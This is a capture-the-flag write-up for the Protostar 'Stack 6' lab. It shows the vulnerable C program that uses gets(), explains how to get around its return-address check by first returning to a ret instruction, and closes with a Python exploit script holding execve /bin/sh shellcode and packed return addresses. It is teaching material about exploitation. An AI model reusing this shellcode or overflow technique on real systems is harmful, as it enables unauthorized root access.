# Stack 6

## Source code

```
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void getpath()
{
  char buffer[64];
  unsigned int ret;

  printf("input path please: "); fflush(stdout);

  gets(buffer);

  ret = __builtin_return_address(0);

  if((ret & 0xbf000000) == 0xbf000000) {
    printf("bzzzt (%p)\n", ret);
    _exit(1);
  }

  printf("got path %s\n", buffer);
}

int main(int argc, char **argv)
{
  getpath();
}
```

## Challenge

In this challenge we again need to modify saved eip like stack 5 but our return address cannot start with `0xb` if this happens binary will exit and we wont be able to get a shell so this challenge can be done in numberous ways i am going to use return oriented programming in this

basically i am going to return to ret statement of getpath function and hence the computer will again pop the next address on stack to eip where i will store the address of my shellcode and so eip will then point to my shellcode and voila i will be able to get access to root

so let's first get the first jump address

![](images/stack6_0.png)

that is `0x080484f9`
and then the address of our buffer (i.e, shellcode)

![](images/stack6_1.png)

that is `0xbffff7a1`
so let's design the payload

```
#!/usr/bin/env python
import struct
shellcode = "\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x0b\x68\x2f\x73\x68\x4e\x68\x2f\x62\x69\x6e\x88\x4c\x24\x07\x89\xe3\xcd\x80"
nops = '\x90'*(76-len(shellcode))
ebp = 'BBBB'
first_return_address = struct.pack('<I',0x080484f9)
second_return_address = struct.pack('<I',0xbffff7a1)
print nops+shellcode+ebp+first_return_address+second_return_address
```

![](images/stack6_2.png)